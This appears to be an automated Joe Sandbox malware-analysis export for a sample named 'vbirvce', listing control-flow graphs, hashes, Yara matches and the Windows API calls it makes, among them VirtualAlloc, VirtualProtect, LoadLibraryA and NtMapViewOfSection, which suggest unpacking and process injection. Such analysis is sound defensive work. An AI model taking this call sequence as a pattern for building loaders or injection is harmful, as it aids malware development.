                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: CreateProcessTerminateThreadUser
                                              • String ID:
                                              • API String ID: 1921587553-0
                                              • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                              • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                              • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                              • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 6c003c-6c0047 1 6c004c-6c0263 call 6c0a3f call 6c0e0f call 6c0d90 VirtualAlloc 0->1 2 6c0049 0->2 17 6c028b-6c0292 1->17 18 6c0265-6c0289 call 6c0a69 1->18 2->1 20 6c02a1-6c02b0 17->20 22 6c02ce-6c03c2 VirtualProtect call 6c0cce call 6c0ce7 18->22 20->22 23 6c02b2-6c02cc 20->23 29 6c03d1-6c03e0 22->29 23->20 30 6c0439-6c04b8 VirtualFree 29->30 31 6c03e2-6c0437 call 6c0ce7 29->31 33 6c04be-6c04cd 30->33 34 6c05f4-6c05fe 30->34 31->29 36 6c04d3-6c04dd 33->36 37 6c077f-6c0789 34->37 38 6c0604-6c060d 34->38 36->34 40 6c04e3-6c0505 36->40 41 6c078b-6c07a3 37->41 42 6c07a6-6c07b0 37->42 38->37 43 6c0613-6c0637 38->43 51 6c0517-6c0520 40->51 52 6c0507-6c0515 40->52 41->42 44 6c086e-6c08be LoadLibraryA 42->44 45 6c07b6-6c07cb 42->45 46 6c063e-6c0648 43->46 50 6c08c7-6c08f9 44->50 48 6c07d2-6c07d5 45->48 46->37 49 6c064e-6c065a 46->49 53 6c0824-6c0833 48->53 54 6c07d7-6c07e0 48->54 49->37 55 6c0660-6c066a 49->55 58 6c08fb-6c0901 50->58 59 6c0902-6c091d 50->59 60 6c0526-6c0547 51->60 52->60 57 6c0839-6c083c 53->57 61 6c07e4-6c0822 54->61 62 6c07e2 54->62 56 6c067a-6c0689 55->56 63 6c068f-6c06b2 56->63 64 6c0750-6c077a 56->64 57->44 65 6c083e-6c0847 57->65 58->59 66 6c054d-6c0550 60->66 61->48 62->53 67 6c06ef-6c06fc 63->67 68 6c06b4-6c06ed 63->68 64->46 69 6c0849 65->69 70 6c084b-6c086c 65->70 72 6c0556-6c056b 66->72 73 6c05e0-6c05ef 66->73 76 6c06fe-6c0748 67->76 77 6c074b 67->77 68->67 69->44 70->57 74 6c056d 72->74 75 6c056f-6c057a 72->75 73->36 74->73 78 6c057c-6c0599 75->78 79 6c059b-6c05bb 75->79 76->77 77->56 84 6c05bd-6c05db 78->84 79->84 84->66
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006C024D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6c0000_vbirvce.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cess$kernel32.dll
                                              • API String ID: 4275171209-1230238691
                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction ID: a16ad12f4b347be2b0c0f4aa935509a1366d3d88948981c0025655a100cedf30
                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                              • Instruction Fuzzy Hash: F4525874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 319 7134be-7134d7 320 7134d9-7134db 319->320 321 7134e2-7134ee CreateToolhelp32Snapshot 320->321 322 7134dd 320->322 323 7134f0-7134f6 321->323 324 7134fe-71350b Module32First 321->324 322->321 323->324 329 7134f8-7134fc 323->329 325 713514-71351c 324->325 326 71350d-71350e call 71317d 324->326 330 713513 326->330 329->320 329->324 330->325
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007134E6
                                              • Module32First.KERNEL32(00000000,00000224), ref: 00713506
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, Offset: 00701000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_701000_vbirvce.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                              • String ID:
                                              • API String ID: 3833638111-0
                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction ID: c571adc3fb9c7ac8e6938596df9170ab0ce8f86f2714f356d56fb8661ddf2e14
                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                              • Instruction Fuzzy Hash: 1FF062362007146BD7213ABD988DABAB6ECAF49725F140528EA46A14C0DA78ED858A61

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 332 6c0e0f-6c0e24 SetErrorMode * 2 333 6c0e2b-6c0e2c 332->333 334 6c0e26 332->334 334->333
                                              APIs
                                              • SetErrorMode.KERNELBASE(00000400,?,?,006C0223,?,?), ref: 006C0E19
                                              • SetErrorMode.KERNELBASE(00000000,?,?,006C0223,?,?), ref: 006C0E1E
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996759719.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006C0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_6c0000_vbirvce.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction ID: 4685c5a770edda50dbe0b2dc837f552568978304271461a35dbeccacd63f79b3
                                              • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                              • Instruction Fuzzy Hash: 97D01231145129B7D7003A94DC0DBDD7B1CDF09B62F008411FB0DD9180C770994046E5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                              • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                              • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                              • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                              • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                              • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                              • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                              • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                              • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                              • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                              • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                              • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                              • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 444 71317d-7131b7 call 713490 447 713205 444->447 448 7131b9-7131ec VirtualAlloc call 71320a 444->448 447->447 450 7131f1-713203 448->450 450->447
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007131CE
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996874431.0000000000701000.00000040.00000020.00020000.00000000.sdmp, Offset: 00701000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_701000_vbirvce.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction ID: a7b6f22b35a090b18b3dafe03c7b64698d1311a2110b010bc9266e4cdb571224
                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                              • Instruction Fuzzy Hash: 9E113C79A00208EFDB01DF98C989E98BFF5AF08350F158094F9489B362D375EA90DF80

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                              APIs
                                              • Sleep.KERNELBASE(00001388), ref: 00401936
                                                • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1996471275.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_400000_vbirvce.jbxd
                                              Similarity
                                              • API ID: Section$CreateDuplicateObjectSleepView
                                              • String ID:
                                              • API String ID: 1885482327-0
                                              • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                              • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                              • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                              • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F